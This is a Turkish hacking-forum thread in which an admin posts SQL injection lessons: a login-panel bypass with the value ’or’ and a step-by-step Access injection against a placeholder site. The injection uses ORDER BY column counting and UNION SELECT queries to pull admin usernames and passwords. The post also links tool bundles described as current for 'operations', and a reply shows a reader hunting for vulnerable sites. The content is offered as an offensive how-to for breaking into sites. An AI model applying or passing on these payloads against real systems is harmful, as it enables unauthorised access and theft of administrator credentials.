SQL Injection Dersleri

[Admin]

S.A. ;Bu
Konuda sizlere SQL Injection dersi vereceğim.Her türlü makale-video’yu
sağlayacağım ve de bütün SQL yöntemlerine de bakmaya çalışacağım.Bütün
Döküman-Video-Makaleler bana aittir,başka yerden alıntı vs.
değildir.Konu geniş,ayrıntılı ve detaylı olucak(Bazı tool’larla da
işlev yapacağım) bu yüzden bakmanızı tavsiye ederim.
*******************************************[SQL
Injection Dersleri Tamamlanmıştır.Bitirilen Injection Dersleri
Aşağıdadır.İndirmek İsteyen Arkadaşlar Aşağıdaki Linkten İndirebilirler.
Üstüne de Hangi Videolardan Başlayacağınızı Beni Oku adlı dosyada belirttim.Bütün SQL Injection Derslerim Download ;http://s2.dosya.tc/Sqlderslerim_hayber.rar.html

Alternatif Link: http://www.zshare.net/download/65701780549606eb/
]Operasyon için günceldir..SQL Helper, Admin panel vb. gibi bir sürü tool’u paylaşıyorum.İçerik Download ;http://www.zshare.net/download/76836283b755c1fd/[b]Rar Şifresi ;HideSystemİlk konumuz ; SQL Injection ile Login Panelleri ByPass Etmek.Injection kodumuz > ’ or ’]Bu kodla admin panellerine login olabiliriz.Fakat pek fazla bulunmuyor artık bu,yinede bahsedeyim dedim.Buradaki oluşumda mantık ;Hedef sitenin admin panelindeki kaynak kodlarıyla kolon adlarını görürüz(örnek kolon adları : username ve password olsun )Şimdi buradaki ’or’ u kullanarak username ve password kolonlardaki boş değerleri getiriyoruz.Bu
kod çalıştığı zaman o veritabanı sistemindeki ilk kullanıcı olarak
giriş yapmış oluyoruz,ki ilk kullanıcılar her zaman yöneticidir..Örnek ;
Kullanıcı adı : ’or’Şifre : ’or’[Giriş yaptım üstte gördüğünüz gibi.

[size=9]SQL Injection - II. Ders
Access SQL Injection
S.A. arkadaşlar
Access SQL Injection çoğu zaman asp diliyle yazılmış sitelerde bulunur.
Sitemiz www.haybersqlogretiyo.com olsun.
Bu sitede ID Değeri olan linkler arayacağız SQL Injection için.
Bunları nasıl buluruz?
Mesela sitenin haber bölümü vardır.
www.haybersqlogretiyo.com/news.asp?id=2 gibi
yada başka bölümü vardır
www.haybersqlogretiyo.com/baskabibolum.asp?id=10
gibi.
İşte böyle id= değeri olan linkler arayacağız.
Bu linklerin numarasının ucuna Injection hatası almamız için " ’ ’a vs. gibi şeyler ekleyeceğiz.
Bakınız ;
www.haybersqlogretiyo.com/baskabibolum.asp?id=10"
Eğer şöyle bir hata veriyorsa o sitede SQL Injection var demektir.
----------------------------------------
Microsoft JET Database Engine error ’80040e14’
Syntax error in string in query expression ’id = 10";’.
/baskabirbolum.asp, line 7
-------------------------------
Evet
SQL Injection olduğunu gördük.Şimdi ise arkadaşlar injection yapmamız
için sitenin tablo adını,kolon sayısını,kolon adlarını bilmemiz gerekir.
Accessde iş tahmindir arkadaşlar,deneme/yanılma yöntemiyle birçok iş yapılır.
Şimdi ise kolon sayılarını bulacağız.
Kolon sayılarını bulmak için order+by fonksiyonunu kullacağız.
www.haybersqlogretiyo.com/baskabibolum.asp?id=10+order+by+1
Order+by+1 dedik ekran aynı hiçbir hata yok hatta ekranda yazılar var?
www.haybersqlogretiyo.com/baskabibolum.asp?id=10+order+by+10 dedik Fakat farklı bir ekran var.
Alınan hataya bakalım,
------------------------------------------------
Microsoft JET Database Engine error ’80040e14’
The Microsoft Jet database engine does not recognize ’10’ as a valid field name or expression.
/news.asp, line 7
-----------------------------------------------
10’dan düşük kolon sayısı olduğunu belirtiyor bu hatada.
İşte böyle giderek kolon sayısını bulabiliriz.
www.haybersqlogretiyo.com/baskabibolum.asp?id=10+order+by+9 yapalım yine aynı hatayı verdi?
Bu sefer 1 basamak daha düşürüyoruz yine aynı hatayı verdi?
işte bu hatadan başka birşey çıkarsa o kolon sayısını belirtir.
Yani son durumda ;
www.haybersqlogretiyo.com/baskabibolum.asp?id=10+order+by+8 dedik ve başka bir ekran çıktı.

Böyle bir yazı aldık diyelim.İşte bu 8 tane kolon’un olduğunu gösterir.
Şimdi kolon sayısınıda bulduk ama, bir tek tablo adı ve o tablo adına uygun kolon adları kaldı.
Kolon sayılarını yazdık arkadaşlar ve hayber adlı tablo adını da ekledik şöyle bir hata aldık?
www.haybersqlogretiyo.com/baskabibolum.asp?id=10+union+select+0,1,2,3,4,5,6,7+from+hayber girdik ve böyle bir hata aldık;
---------------------------------------
Microsoft JET Database Engine error ’80040e37’
The
Microsoft Jet database engine cannot find the input table or query
’hayber’. Make sure it exists and that its name is spelled correctly.
/baskabirbolum.asp, line 7
--------------------------------------
Hatamız diyorki,hayber adlı bir tablo bende bulunmuyor.
Şimdi başka tablo adları deneyeceğiz.
Yönetici vs. şifresi nerde barınır? yada haberler ? (News tablosunda,haber tablosunda gibi)
Users,user,admin,admins gibi tablo adlarında.Onları deneyelim birde.
www.haybersqlogretiyo.com/baskabibolum.asp?id=10+union+select+0,1,2,3,4,5,6,7+from+users
Denedik girdik ve;

Ve
gördüğünüz gibi kolon sayıları ekrana yansıdı.Bu da demek oluyorki
uygun bir tablo adını seçtik,şifrelerin barındığı bir tablo adı bulduk.
Şimdi ise ekrana vuran kolon sayısının yerine kolon adı yazarak admin ve şifresini almak kaldı.
Bazı kolon adları;
username,password,user,pass vs. vs. ( tabi bu her tablo adına göre değişir)
kolon adlarını yani 1 e username 2 ye de password yazdık girdik ve ;
www.haybersqlogretiyo.com/baskabibolum.asp?id=10+union+select+0,username,password,3,4,5,6,7+from+users

ve işte gördüğünüz gibi yönetici adı ve şifresi çıktı.
Üstteki yönetici adı(yani username)
alttaki de password(yani şifresi)
Accessde iş tahmindir arkadaşlar.Deneme/yanılma yöntemiyle yapıcaksınız.
Biraz
uzun,karışık vs. olabilir fakat en basit ve en anlaşılır yolla
anlatmaya çalıştım.Daha iyi anlamanız için ileriki saatlerde de video
da çekeceğim.
Saygılarımla,
Çelik, Ekrem.

[samet_35]

hocam verdiğiniz bilgiler gerçekten güzel ama ben site içerisinde baya bi dolaştım yetmedi başka siteleride gezdim ama (ıd) bulamadım linklerde 
ben nerede yanlış yapıyorum ?